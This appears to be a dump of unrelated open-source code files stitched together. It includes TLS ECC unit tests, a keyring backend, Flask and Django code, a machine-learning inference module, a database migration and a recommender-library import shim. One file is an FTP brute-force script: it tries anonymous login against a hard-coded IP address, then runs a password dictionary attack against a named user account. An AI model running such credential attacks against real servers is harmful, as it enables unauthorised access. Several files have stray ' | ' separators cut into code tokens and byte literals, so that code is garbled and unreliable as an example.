ioef/tlslite-ng | unit_tests/test_tlslite_utils_ecc.py | Python | lgpl-2.1 | 8,381 | 0.000716 |
# Copyright (c) 2014, Hubert Kario
#
# See the LICENSE file for legal information regarding use of this file.
# compatibility with Python 2.6, for that we need unittest2 package,
# which is not available on 3.3 or 3.4
try:
import unittest2 as unittest
except ImportError:
import unittest
from tlslite.utils.ecc import decodeX962Point, encodeX962Point, getCurveByName,\
getPointByteSize
import ecdsa
class TestEncoder(unittest.TestCase):
def test_encode_P_256_point(self):
point = ecdsa.NIST256p.generator * 200
self.assertEqual(encodeX962Point(point),
bytearray(b'\x04'
# x coordinate
b'\x3a\x53\x5b\xd0\xbe\x46\x6f\xf3\xd8\x56'
b'\xa0\x77\xaa\xd9\x50\x4f\x16\xaa\x5d\x52'
b'\x28\xfc\xd7\xc2\x77\x48\x85\xee\x21\x3f'
b'\x3b\x34'
# y coordinate
b'\x66\xab\xa8\x18\x5b\x33\x41\xe0\xc2\xe3'
b'\xd1\xb3\xae\x69\xe4\x7d\x0f\x01\xd4\xbb'
b'\xd7\x06\xd9\x57\x8b\x0b\x65\xd6\xd3\xde'
b'\x1e\xfe'
))
def test_encode_P_256_point_with_zero_first_byte_on_x(self):
point = ecdsa.NIST256p.generator * 379
self.assertEqual(encodeX962Point(point),
bytearray(b'\x04'
b'\x00\x55\x43\x89\x4a\xf3\xd0\x0e\xd7\xd7'
b'\x40\xab\xdb\xd7\x5c\x96\xb0\x68\x77\xb7'
b'\x87\xdb\x5f\x70\xee\xa7\x8b\x90\xa8\xd7'
b'\xc0\x0a'
b'\xbb\x4c\x85\xa3\xd8\xea\x29\xef\xaa\xfa'
b'\x24\x40\x69\x12\xdd\x84\xd5\xb1\x4d\xc3'
b'\x2b\xf6\x56\xef\x6c\x6b\xd5\x8a\x5d\x94'
b'\x3f\x92'
))
def test_encode_P_256_point_with_zero_first_byte_on_y(self):
point = ecdsa.NIST256p.generator * 43
self.assertEqual(encodeX962Point(point),
bytearray(b'\x04'
b'\x98\x6a\xe2\x50\x6f\x1f\xf1\x04\xd0\x42'
b'\x30\x86\x1d\x8f\x4b\x49\x8f\x4b\xc4\xc6'
b'\xd0\x09\xb3\x0f\x75\x44\xdc\x12\x9b\x82'
b'\xd2\x8d'
b'\x00\x3c\xcc\xc0\xa6\x46\x0e\x0a\xe3\x28'
b'\xa4\xd9\x7d\x3c\x7b\x61\xd8\x6f\xc6\x28'
b'\x9c\x18\x9f\x25\x25\x11\x0c\x44\x1b\xb0'
b'\x7e\x97'
))
def test_encode_P_256_point_with_two_zero_first_bytes_on_x(self):
point = ecdsa.NIST256p.generator * 40393
self.assertEqual(encodeX962Point(point),
bytearray(b'\x04'
b'\x00\x00\x3f\x5f\x17\x8a\xa0\x70\x6c\x42'
b'\x31\xeb\x6e\x54\x95\xaa\x16\x42\xc5\xb8'
b'\xa9\x94\x12\x7c\x89\x46\x5f\x22\x99\x4a'
b'\x42\xf9'
b'\xc2\x48\xb3\x37\x59\x9f\x0c\x2f\x29\x77'
b'\x2e\x25\x6f\x1d\x55\x49\xc8\x9b\xa9\xe5'
b'\x73\x13\x82\xcd\x1e\x3c\xc0\x9d\x10\xd0'
b'\x0b\x55'))
def test_encode_P_521_point(self):
point = ecdsa.NIST521p.generator * 200
self.assertEqual(encodeX962Point(point),
bytearray(b'\x04'
b'\x00\x3e\x2a\x2f\x9f\xd5\x9f\xc3\x8d\xfb'
b'\xde\x77\x26\xa0\xbf\xc6\x48\x2a\x6b\x2a'
b'\x86\xf6\x29\xb8\x34\xa0\x6c\x3d\x66\xcd'
b'\x79\x8d\x9f\x86\x2e\x89\x31\xf7\x10\xc7'
b'\xce\x89\x15\x9f\x35\x8b\x4a\x5c\x5b\xb3'
b'\xd2\xcc\x9e\x1b\x6e\x94\x36\x23\x6d\x7d'
b'\x6a\x5e\x00\xbc\x2b\xbe'
b'\x01\x56\x7a\x41\xcb\x48\x8d\xca\xd8\xe6'
b'\x3a\x3f\x95\xb0\x8a\xf6\x99\x2a\x69\x6a'
b'\x37\xdf\xc6\xa1\x93\xff\xbc\x3f\x91\xa2'
b'\x96\xf3\x3c\x66\x1 | 5\x57\x3c\x1c\x06\x7f'
b'\x0a\x06\x4d\x18\xbd\x0c\x81\x4e\xf7\x2a'
b'\x8f\x76\xf8\x7f\x9b\x7d\xff\xb2\xf4\x26'
b'\x36\x43\x43\x86\x | 11\x89'))
class TestDecoder(unittest.TestCase):
def test_decode_P_256_point(self):
point = ecdsa.NIST256p.generator * 379
data = bytearray(b'\x04'
b'\x00\x55\x43\x89\x4a\xf3\xd0\x0e\xd7\xd7'
b'\x40\xab\xdb\xd7\x5c\x96\xb0\x68\x77\xb7'
b'\x87\xdb\x5f\x70\xee\xa7\x8b\x90\xa8\xd7'
b'\xc0\x0a'
b'\xbb\x4c\x85\xa3\xd8\xea\x29\xef\xaa\xfa'
b'\x24\x40\x69\x12\xdd\x84\xd5\xb1\x4d\xc3'
b'\x2b\xf6\x56\xef\x6c\x6b\xd5\x8a\x5d\x94'
b'\x3f\x92'
)
decoded_point = decodeX962Point(data, ecdsa.NIST256p)
self.assertEqual(point, decoded_point)
def test_decode_P_521_point(self):
data = bytearray(b'\x04'
b'\x01\x7d\x8a\x5d\x11\x03\x4a\xaf\x01\x26'
b'\x5f\x2d\xd6\x2d\x76\xeb\xd8\xbe\x4e\xfb'
b'\x3b\x4b\xd2\x05\x5a\xed\x4c\x6d\x20\xc7'
b'\xf3\xd7\x08\xab\x21\x9e\x34\xfd\x14\x56'
b'\x3d\x47\xd0\x02\x65\x15\xc2\xdd\x2d\x60'
b'\x66\xf9\x15\x64\x55\x7a\xae\x56\xa6\x7a'
b'\x28\x51\x65\x26\x5c\xcc'
b'\x01\xd4\x19\x56\xfa\x14\x6a\xdb\x83\x1c'
b'\xb6\x1a\xc4\x4b\x40\xb1\xcb\xcc\x9e\x4f'
b'\x57\x2c\xb2\x72\x70\xb9\xef\x38\x15\xae'
b'\x87\x1f\x85\x40\x94\xda\x69\xed\x97\xeb'
b'\xdc\x72\x25\x25\x61\x76\xb2\xde\xed\xa2'
b'\xb0\x5c\xca\xc4\x83\x8f\xfb\x54\xae\xe0'
b'\x07\x45\x0b\xbf\x7c\xfc')
point = decodeX962Point(data, ecdsa.NIST521p)
self.assertIsNotNone(point)
self.assertEqual(encodeX962Point(point), data)
def test_decode_with_missing_data(self):
data = bytearray(b'\x04'
b'\x00\x55\x43\x89\x4a\xf3\xd0\x0e\xd7\xd7'
b'\x40\xab\xdb\xd7\x5c\x96\xb0\x68\x77\xb7'
b'\x87\xdb\x5f\x70\xee\xa7\x8b\x90\xa8\xd7'
b'\xc0\x0a'
b'\xbb\x4c\x85\xa3\xd8\xea\x29\xef\xaa\xfa'
b'\x24\x40\x69\x12\xdd\x84\xd5\xb1\x4d\xc3'
b'\x2b\xf6\x56\xef\x6c\x6b\xd5\x8a\x5d\x94'
#b'\x3f\x92'
)
# XXX will change later as decoder in tlslite-ng needs to be updated
with self.assertRaises(SyntaxError):
decodeX962Point(data, ecdsa.NIST256p)
class TestCurveLookup(unittest.TestCase):
    """Tests for resolving an ecdsa curve object from its TLS group name."""

    def test_with_correct_name(self):
        # A known TLS curve name resolves to the matching ecdsa curve object.
        self.assertIs(getCurveByName('secp256r1'), ecdsa.NIST256p)

    def test_with_invalid_name(self):
        # Python-side class names are not valid TLS curve names.
        self.assertRaises(ValueError, getCurveByName, 'NIST256p')
class TestGetPointByteSize(unittest.TestCase):
def test_with_curve(self):
self.assertEqual(getPointByteSize(ecdsa.NIST256p), 32)
def test_with_point(self):
|
ruuk/script.module.password.storage | lib/keyring/backends/SecretService.py | Python | gpl-2.0 | 2,786 | 0.001077 | import logging
from ..util import properties
from ..util import XDG
from ..backend import KeyringBackend
from ..errors import (InitError, PasswordDeleteError,
ExceptionRaisedContext)
try:
import secretstorage
import secretstorage.exceptions as exceptions
except ImportError:
pass
log = logging.getLogger(__name__)
class Keyring(KeyringBackend):
    """Secret Service Keyring (GNOME Keyring etc. reached over D-Bus)."""

    @properties.ClassProperty
    @classmethod
    @XDG.Preference('Gnome')
    def priority(cls):
        # Backend is viable only when SecretStorage >= 1.0 is importable
        # and a Secret Service daemon is reachable over D-Bus.
        with ExceptionRaisedContext() as exc:
            secretstorage.__name__
        if exc:
            raise RuntimeError("SecretStorage required")
        if not hasattr(secretstorage, 'get_default_collection'):
            raise RuntimeError("SecretStorage 1.0 or newer required")
        try:
            bus = secretstorage.dbus_init()
            list(secretstorage.get_all_collections(bus))
        except exceptions.SecretServiceNotAvailableException as e:
            raise RuntimeError(
                "Unable to initialize SecretService: %s" % e)
        return 5

    def get_default_collection(self):
        """Return the default collection, unlocking it if necessary.

        :raises InitError: if the collection cannot be obtained or the
            user dismisses the unlock prompt.
        """
        bus = secretstorage.dbus_init()
        try:
            collection = secretstorage.get_default_collection(bus)
        except exceptions.SecretStorageException as e:
            raise InitError("Failed to create the collection: %s." % e)
        if collection.is_locked():
            collection.unlock()
            if collection.is_locked():  # User dismissed the prompt
                raise InitError("Failed to unlock the collection!")
        return collection

    def get_password(self, service, username):
        """Get password of the username for the service
        """
        collection = self.get_default_collection()
        items = collection.search_items(
            {"username": username, "service": service})
        for item in items:
            # Return the first matching secret only.
            return item.get_secret().decode('utf-8')

    def set_password(self, service, username, password):
        """Set password for the username of the service
        """
        collection = self.get_default_collection()
        attributes = {
            "application": "python-keyring",
            "service": service,
            "username": username
        }
        label = "Password for '%s' on '%s'" % (username, service)
        collection.create_item(label, attributes, password, replace=True)

    def delete_password(self, service, username):
        """Delete the stored password (only the first one)
        """
        collection = self.get_default_collection()
        items = collection.search_items(
            {"username": username, "service": service})
        for item in items:
            return item.delete()
        raise PasswordDeleteError("No such password!")
|
dnguyen0304/clare | clare/clare/application/download_bot/handlers.py | Python | mit | 1,172 | 0 | # -*- coding: utf-8 -*-
from . import exceptions
from clare import common
from clare.common import messaging
from clare.common import retry
class NopHandler(messaging.consumer.interfaces.IHandler):
    """Handler that deliberately ignores every record (a no-op)."""

    def handle(self, record):
        # Intentionally discard the record.
        pass

    def __repr__(self):
        return '{}()'.format(self.__class__.__name__)
class OrchestratingHandler(messaging.consumer.interfaces.IHandler):
    """Delegate to a wrapped handler, absorbing expected terminal errors."""

    def __init__(self, handler, logger):
        """
        Parameters
        ----------
        handler : clare.application.download_bot.handlers.Download
        logger : logging.Logger
        """
        self._handler = handler
        self._logger = logger

    def handle(self, record):
        # Expected terminal conditions (expired room, exhausted retries)
        # are logged at debug level rather than propagated.
        try:
            self._handler.handle(record=record)
        except (exceptions.RoomExpired, retry.exceptions.MaximumRetry) as e:
            message = common.logging.utilities.format_exception(e=e)
            self._logger.debug(msg=message)

    def __repr__(self):
        repr_ = '{}(handler={}, logger={})'
        return repr_.format(self.__class__.__name__,
                            self._handler,
                            self._logger)
|
nick-jonas/static-jspm-boiler | main.py | Python | unlicense | 662 | 0.012085 | import os
import sys
# Import the Flask Framework
from flask import Flask, request, render_template
# True when running under the App Engine development server.
isDev = os.environ["SERVER_SOFTWARE"].find('Development') == 0

app = Flask(__name__)
# Note: We don't need to call run() since our application is embedded within
# the App Engine WSGI application server.


@app.route('/')
def home():
    """Render the landing page, passing the dev-mode flag to the template."""
    return render_template('index.html', isDev=isDev)
@app.errorhandler(404)
def page_not_found(e):
    """Return a custom 404 error."""
    return 'Sorry, Nothing at this URL.', 404


@app.errorhandler(500)
def server_error(e):
    """Return a custom 500 error."""
    # Renamed from page_not_found: the duplicate name shadowed the 404
    # handler's module-level binding (Flask registers by decorator, so
    # behavior is unchanged).
    return 'Sorry, unexpected error: {}'.format(e), 500
|
ceholden/yatsm | yatsm/version.py | Python | mit | 22 | 0 | __versio | n__ = | '0.7.0'
|
altosaar/proximity_vi | inferences/proximity_variational_inference.py | Python | mit | 5,782 | 0.006918 | import tensorflow as tf
import numpy as np
import collections
import time
import util
from .variational_inference import VariationalInference
from inferences import proximity_statistics
fw = tf.contrib.framework
layers = tf.contrib.layers
dist = tf.contrib.distributions
class ProximityVariationalInference(VariationalInference):
def __init__(self, session, config, model, variational, data):
super(ProximityVariationalInference, self).__init__(
session, config, model, variational, data)
cfg = self.config
self.build_proximity_statistic()
self.build_distance()
if not cfg['optim/deterministic_annealing']:
self.build_magnitude()
def build_proximity_statistic(self):
cfg = self.config
if cfg['c/proximity_statistic'] == 'entropy':
s = proximity_statistics.Entropy(cfg, self.variational)
elif cfg['c/proximity_statistic'] == 'kl':
s = proximity_statistics.KL(cfg, self.variational, model=self.model)
elif cfg['c/proximity_statistic'] == 'mean_variance':
s = proximity_statistics.MeanVariance(cfg, self.variational)
elif cfg['c/proximity_statistic'] == 'active_units':
s = proximity_statistics.ActiveUnits(cfg, self.variational)
elif cfg['c/proximity_statistic'] == 'activations_layer_0_fc0':
s = proximity_statistics.Activations(cfg, self.variational)
elif cfg['c/proximity_statistic'] == 'log_likelihood':
s = proximity_statistics.LogLikelihood(
cfg, self.variational, model=self.model, q_z_sample=self.q_z_sample,
data=self.data)
elif cfg['c/proximity_statistic'] == 'orthogonal':
s = proximity_statistics.Orthogonal(cfg, self.variational)
else:
raise ValueError('Proximity statistic %s not implemented!' %
cfg['c/proximity_statistic'])
self.proximity_statistic = s
def build_distance(self):
"""Distance between statistic f(lambda) and its moving average."""
cfg = self.config
distance = {}
proximity = self.proximity_statistic
moving_average = proximity.moving_average
for name, stat in proximity.statistic.items():
difference = stat - moving_average[name]
if cfg['c/distance'] == 'square_difference':
dist = tf.square(difference)
elif cfg['c/distance'] == 'inverse_huber':
dist = tf.where(tf.abs(difference) <= 1.0,
tf.abs(difference), 0.5 * tf.square(difference) + 0.5)
if 'latent' in proximity.named_shape[name]:
dist = tf.reduce_sum(dist, proximity.named_shape[name]['latent'])
proximity.named_shape[name].remove('latent')
if 'param_0' in proximity.named_shape[name]:
dist = tf.reduce_sum(dist, proximity.named_shape[name]['param_0'])
proximity.named_shape[name].remove('param_0')
if 'param_1' in proximity.named_shape[name]:
dist = tf.reduce_sum(dist, proximity.named_shape[name]['param_1'])
proximity.named_shape[name].remove('param_1')
distance[name] = dist
name = '_'.join(['c/distance', cfg['c/proximity_statistic'], name])
tf.summary.scalar(name, tf.reduce_mean(dist))
self.distance = distance
res = 0.
for dist in distance.values():
res += dist
self.distance_sum = res
def log_stats(self, feed_dict={}):
cfg = self.config
self.t = time.time()
sess = self.session
(np_step, np_elbo, np_entropy, summary_str, np_distance) = sess.run(
[self.global_step, self.elbo_sum, self.q_entropy, self.summary_op,
self.distance_sum], feed_dict)
msg = ('Iteration: {0:d} ELBO: {1:.3e} Entropy: {2:.3e} '
'Examples/s: {3:.3e} ').format(
np_step, np_elbo / cfg['batch_size'], np_entropy,
cfg['batch_size'] * cfg['print_every'] / (self.t - self.t0))
constraint_msg = ('Distance sum: {:.3e}').format(np.mean(np_distance))
constraint_msg += ' k: {:.3e}'.format(sess.run(self.magnitude, feed_dict))
if cfg['c/proximity_statistic'] == 'active_units':
np_variances = self.session.run(
self.proximity_statistic.statistic_list, feed_dict)
def active(np_var): return np.where(np_var > 0.01)[0].shape[0]
msg += ' Active units: %d ' % np.mean([active(v) for v in np_variances])
self.t0 = self.t
self.summary_writer.add_summary(summary_str, global_step=np_step)
self.save_params(np_step)
# self.log_grad_stats(feed_dict)
return msg + constraint_msg
def build_q_gradients(self):
cfg = self.config
q_gradients = self.q_neg_elbo_grad
constraint_grad = [0.] | * len(self.q_params)
magnitude = self.magnitude
if cfg['c/decay'] == 'linear':
magnitude = tf.maximum(magnitude, 0.)
for name, distance in self.distance.items():
distance_grad = tf.gradients(distance, self.q_params)
for i in range(len(self.q_params)):
if distance_grad[i] is not None:
param_name = util.tensor_name(self.q_params[i])
update = magnitude * distance_grad[i]
constraint_grad[i] += update
q_gradients[i] += update
| update_norm = util.norm(update)
fraction = tf.reduce_mean(
update_norm / util.norm(self.q_neg_elbo_grad[i] + update))
fraction = tf.Print(fraction, [fraction], 'fraction: ')
tf.summary.scalar('_'.join(['c/fraction_grad_d', name, param_name]),
fraction)
tf.summary.scalar(
'_'.join(['c/norm_grad_constraint', name, param_name]),
update_norm)
tf.summary.scalar(
'_'.join(
['c/ratio_grad_constraint_grad_neg_elbo', name, param_name]),
update_norm / self.q_neg_elbo_grad_norm[i])
self.q_gradients = q_gradients
self.q_constraint_grad = constraint_grad
|
barbieauglend/Learning_python | PT/FIPBruteForce.py | Python | unlicense | 1,369 | 0.006574 | import ftplib
def connect(host, user, password):
    """Return True if an FTP login to ``host`` succeeds with the credentials.

    Any failure (DNS error, connection refused, authentication rejected)
    yields False.
    """
    try:
        ftp = ftplib.FTP(host)
        ftp.login(user, password)
        ftp.quit()
        return True
    except Exception:
        # Narrowed from a bare except so Ctrl-C still interrupts the scan.
        return False
def main():
    """Try anonymous FTP access, then dictionary-attack the target host."""
    # Variables
    targetHostAddress = '10.0.0.24'
    userName = 'bwayne'
    passwordsFilePath = 'passwords.txt'

    # Try to connect using anonymous credentials
    print('[+] Using anonymous credentials for ' + targetHostAddress)
    if connect(targetHostAddress, 'anonymous', 'test@test.com'):
        print('[*] FTP Anonymous log on succeeded on host ' + targetHostAddress)
    else:
        print('[*] FTP Anonymous log on failed on host ' + targetHostAddress)

    # Try brute force using dictionary; `with` guarantees the wordlist is
    # closed (the original leaked the file handle).
    with open(passwordsFilePath, 'r') as passwordsFile:
        for line in passwordsFile.readlines():
            password = line.strip('\r').strip('\n')
            print('Testing: ' + str(password))
            if connect(targetHostAddress, userName, password):
                # Password found
                print('[*] FTP log on succeeded on host ' + targetHostAddress + '\n' + 'username: ' + userName + '\n' + 'password: ' + password)
                exit(0)
            else:
                print('[*] FTP log on failed on host ' + targetHostAddress + '\n' + 'username: ' + userName + '\n' + 'password: ' + password)
# Script entry point.
if __name__ == "__main__":
    main()
nathanross/amiens | qlib/fq.audio_strict_long_hq.py | Python | apache-2.0 | 2,403 | 0.013317 | #!/usr/bin/python3
# Copyright 2015 Nathan Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#!/bin/python3
def audio_strict_long_hq(s, l):
    """Decide whether an item qualifies as long, high-quality audio.

    "Strict" means that when required information is missing the item is
    handled conservatively (e.g. m4a files whose length cannot be read get
    a just-over-minimum default length; items with no size are skipped).

    :param s: total audio size in bytes, or None if unknown
    :param l: total audio length in seconds, or None if unknown
    :return: True when the item is at least 20 minutes long and its
             average bitrate is at or above (roughly) 192 kbps
    """
    min_minutes = 20
    if l is None:
        print('fq`using default length')
        # Assume just over the minimum length when the length is unknown.
        l = (1 + min_minutes) * 60
    if s is None:
        # No size information at all: skip.
        return False
    if (s / 1048576) > 1700:
        # Assume uninterested in anything past the size of two FLAC cds.
        return False
    print('fq`length:' + repr(l) + ' size:' + repr(s))
    if l < (min_minutes * 60):
        return False
    bytes_per_second = (s / l)
    kbps = bytes_per_second * (8 / 1024.)
    print('fq`kbps:' + repr(kbps))
    target_min_kbps = 192
    # Even at a nominal CBR the measured rate can vary below the target;
    # 0.96x - 4 is a generous lower bound.
    if kbps < ((target_min_kbps * 0.96) - 4):
        print('fq`skipping as bitrate {} less than target {}'.format(
            repr(kbps), ((target_min_kbps * 0.96) - 4)
        ))
        return False
    return True
callback=audio_strict_long_hq
# Change these constants to tune the filter.
GOAL_TARGET_KBPS=192.
MIN_MINUTES=20
# Generous lower bound on the measured bitrate for a nominal CBR.
TARGET_KBPS=((GOAL_TARGET_KBPS*0.96)-4)
# Conversion factor: bytes/second -> kilobits/second.
BYTE_PS_TO_KBPS=(8/1024.)
# SQL fragment applying the same size/length/bitrate thresholds as the
# callback, so the filter can be pushed down into the database query.
sql='AND totalAudioSize > ' + \
    str((TARGET_KBPS/BYTE_PS_TO_KBPS)*(MIN_MINUTES*60)) + \
    ' AND ((totalAudioLength IS NULL) OR ((totalAudioLength > '+ \
    str(MIN_MINUTES*60) + \
    ') AND ((totalAudioSize/totalAudioLength)*' + \
    str(BYTE_PS_TO_KBPS) + ' >= ' + str(TARGET_KBPS) + ')))'
|
fna/owning-a-home-api | mortgageinsurance/migrations/0003_change_type_va_first_use.py | Python | cc0-1.0 | 2,743 | 0.006198 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
    """Copy the legacy Y/N char flag into the new nullable boolean field."""

    def forwards(self, orm):
        for u in orm.Upfront.objects.all():
            if u.va_first_use == 'Y':
                u.new_va_first_use = True
            elif u.va_first_use == 'N':
                u.new_va_first_use = False
            # Rows with any other flag value keep the field's default.
            u.save()

    def backwards(self, orm):
        # The original char flag is not cleared, but this migration is
        # declared one-way.
        raise RuntimeError("Cannot reverse this migration.")

    models = {
        u'mortgageinsurance.monthly': {
            'Meta': {'object_name': 'Monthly'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'insurer': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'loan_term': ('django.db.models.fields.IntegerField', [], {}),
            'max_fico': ('django.db.models.fields.IntegerField', [], {}),
            'max_loan_amt': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
            'max_ltv': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
            'min_fico': ('django.db.models.fields.IntegerField', [], {}),
            'min_loan_amt': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
            'min_ltv': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
            'pmt_type': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
            'premium': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'})
        },
        u'mortgageinsurance.upfront': {
            'Meta': {'object_name': 'Upfront'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'loan_type': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
            'max_ltv': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
            'min_ltv': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
            'new_va_first_use': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
            'premium': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
            'va_first_use': ('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}),
            'va_status': ('django.db.models.fields.CharField', [], {'max_length': '12', 'blank': 'True'})
        }
    }

    complete_apps = ['mortgageinsurance']
    symmetrical = True
|
gasevi/pyreclab | pypackage/__init__.py | Python | gpl-3.0 | 881 | 0.015891 | import platform
import sys
# On OS X, bindings built against the system Python (2.7.10) live in a
# different shared library than the Homebrew build, so pick the matching
# extension module at import time.
if platform.system() == 'Darwin':
    native_version = (2, 7, 10, 'final', 0)
    cur_version = sys.version_info
    if cur_version == native_version:
        from pyreclab.libpyreclab_native_py import MostPopular, UserAvg, ItemAvg, SlopeOne, UserKnn, ItemKnn, SVD, IFAls, IFAlsConjugateGradient, BprMf
    else:  # brew version
        from pyreclab.libpyreclab import MostPopular, UserAvg, ItemAvg, SlopeOne, UserKnn, ItemKnn, SVD, IFAls, IFAlsConjugateGradient, BprMf
else:
    from pyreclab.libpyreclab import MostPopular, UserAvg, ItemAvg, SlopeOne, UserKnn, ItemKnn, SVD, IFAls, IFAlsConjugateGradient, BprMf

# Public API re-exported from the native extension module.
__all__ = [ 'MostPopular',
            'UserAvg',
            'ItemAvg',
            'SlopeOne',
            'UserKnn',
            'ItemKnn',
            'SVD',
            'IFAls',
            'IFAlsConjugateGradient',
            'BprMf' ]
|
joequant/Fudge-Python | fudgemsg/tests/func_tests/test_deeper_msg.py | Python | apache-2.0 | 4,667 | 0.006642 | #!/usr/bin/env python
#
# Copyrigh CERN, 2010.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. S | ee the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# U | nless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
import cStringIO
from fudgemsg.message import Message, Envelope
from fudgemsg import registry
from fudgemsg import types
from fudgemsg import utils
from nose.plugins.skip import SkipTest
class TestDeeperMsg(unittest.TestCase):
def test_deeper_submsg(self):
# comparison arrays
bytes = ''.join([chr(x%256) for x in range(512)] )
empty = [0] * 128
shorts = range(16)
doubles = [x/10.0 for x in range(16)]
m = Message()
m.add(types.INDICATOR, name=u"Indicator")
m.add(True, name=u"Boolean")
m.add(128, name=u"Byte") # Huh - in the C code it's -128 which isn't a byte!
m.add(-32768, name=u"Short")
m.add(2147483647, name=u"Int")
m.add(9223372036854775807L, name=u"Long")
m.add(1.23456, name=u"Float")
m.add(1.2345678, name=u"Double", type_=registry.DEFAULT_REGISTRY.type_by_id(types.DOUBLE_TYPE_ID))
byte_message= Message()
for size in (4, 8, 16, 20, 32, 64, 128, 256, 512):
byte_message.add(bytes[:size], ordinal=size)
m.add(byte_message, name=u'ByteArrays')
m.add(u'', name=u'Empty String')
m.add(u'This is a string.', name=u'String')
fp_message = Message()
fp_message.add(doubles[:0], name=u'Float[0]', \
type_=registry.DEFAULT_REGISTRY.type_by_id(types.FLOATARRAY_TYPE_ID))
fp_message.add(empty[:15], name=u'Float[15]', \
type_=registry.DEFAULT_REGISTRY.type_by_id(types.FLOATARRAY_TYPE_ID))
fp_message.add(doubles[:0], name=u'Double[0]', \
type_=registry.DEFAULT_REGISTRY.type_by_id(types.DOUBLEARRAY_TYPE_ID))
fp_message.add(doubles[:15], name=u'Double[15]', \
type_=registry.DEFAULT_REGISTRY.type_by_id(types.DOUBLEARRAY_TYPE_ID))
array_message = Message()
array_message.add(bytes[:0], name=u'Byte[0]')
array_message.add(bytes[:15], name=u'Byte[15]')
array_message.add(fp_message, name=u'FP Arrays')
array_message.add(empty[:0], name=u'Short[0]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.SHORTARRAY_TYPE_ID))
array_message.add(shorts[:15], name=u'Short[15]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.SHORTARRAY_TYPE_ID))
array_message.add(empty[:0], name=u'Int[0]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.INTARRAY_TYPE_ID))
array_message.add(empty[:15], name=u'Int[15]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.INTARRAY_TYPE_ID))
array_message.add(empty[:0], name=u'Long[0]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.LONGARRAY_TYPE_ID))
array_message.add(empty[:15], name=u'Long[15]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.LONGARRAY_TYPE_ID))
m.add(array_message, name=u'Arrays')
empty_message = Message()
m.add(empty_message, name=u'Null Message')
e = Envelope(m)
writer = cStringIO.StringIO()
e.encode(writer)
bytes = writer.getvalue()
foo = open('fudgemsg/tests/data/deeper_fudge_msg.dat', 'r')
expected = foo.read()
foo.close()
self.assertEquals(len(expected), len(bytes))
self.assertEquals(expected, bytes)
def test_decode_encode_deeper(self):
"""decode then encode the deeper_fudge_msg.
Check they are the same.
"""
foo = open('fudgemsg/tests/data/deeper_fudge_msg.dat', 'r')
expected = foo.read()
foo.close()
e = Envelope.decode(expected)
writer = cStringIO.StringIO()
e.encode(writer)
bytes = writer.getvalue()
self.assertEquals(len(expected), len(bytes))
self.assertEquals(expected, bytes)
|
daonb/django-committee | src/committee/tests.py | Python | bsd-3-clause | 7,138 | 0.004483 | from datetime import datetime
from django.test import TestCase
from django.conf import settings
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User,Group,Permission
from django.contrib.contenttypes.models import ContentType
from annotatetext.models import Annotation
from actstream.models import Action
from knesset.laws.models import Bill
from knesset.mks.models import Member
from models import *
just_id = lambda x: x.id
class ListViewTest(TestCase):
def setUp(self):
self.committee_1 = Committee.objects.create(name='c1')
self.committee_2 = Committee.objects.create(name='c2')
self.meeting_1 = self.committee_1.meetings.create(date=datetime.now(),
protocol_text='''jacob:
I am a perfectionist
adrian:
I have a deadline''')
self.meeting_1.create_protocol_parts()
self.meeting_2 = self.committee_1.meetings.create(date=datetime.now(),
protocol_text='m2')
self.meeting_2.create_protocol_parts()
self.jacob = User.objects.create_user('jacob', 'jacob@example.com',
'JKM')
(self.group, created) = Group.objects.get_or_create(name='Valid Email')
if created:
self.group.save()
self.group.permissions.add(Permission.objects.get(name='Can add annotation'))
self.jacob.groups.add(self.group)
self.bill_1 = Bill.objects.create(stage='1', title='bill 1')
self.mk_1 = Member.objects.create(name='mk 1')
def testProtocolPart(self):
parts_list = self.meeting_1.parts.list()
self.assertEqual(parts_list.count(), 2)
self.assertEqual(parts_list[0].header, u'jacob')
self.assertEqual(parts_list[0].body, 'I am a perfectionist')
self.assertEqual(parts_list[1].header, u'adrian')
self.assertEqual(parts_list[1].body, 'I have a deadline')
def testPartAnnotation(self):
'''this is more about testing the annotatext app '''
self.assertTrue(self.client.login(username='jacob', password='JKM'))
part = self.meeting_1.parts.list()[0]
